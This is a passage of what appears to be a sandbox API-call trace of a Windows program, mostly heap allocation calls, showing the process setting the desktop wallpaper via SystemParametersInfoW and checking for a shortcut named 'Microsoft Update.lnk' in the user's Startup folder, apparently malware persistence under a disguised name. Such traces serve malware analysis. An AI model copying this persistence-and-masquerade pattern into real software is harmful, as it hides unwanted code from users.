lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0316.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0316.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0316.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0316.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0316.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0316.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0316.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0316.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0316.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0316.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0316.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0316.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0316.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0316.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0316.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0316.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0316.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0316.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0316.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0316.946] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0316.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0316.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0316.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0316.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0316.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0316.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0316.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0316.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0316.947] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0316.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0316.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0316.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0316.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0316.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0316.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0316.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0316.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0316.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0316.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0316.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0316.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0316.948] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0317.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0317.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0317.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0317.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0317.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0317.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0317.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0317.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0317.068] FreeLibrary (hLibModule=0x74f40000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0317.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0317.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0317.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0317.070] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0317.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0317.070] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0317.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0317.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0317.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0317.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0317.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0317.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0317.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0317.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0317.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0317.072] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0317.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0317.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0317.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0317.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0317.073] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0317.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0317.073] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0317.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0317.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0317.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0317.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0317.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0317.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0317.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0317.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0317.075] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: 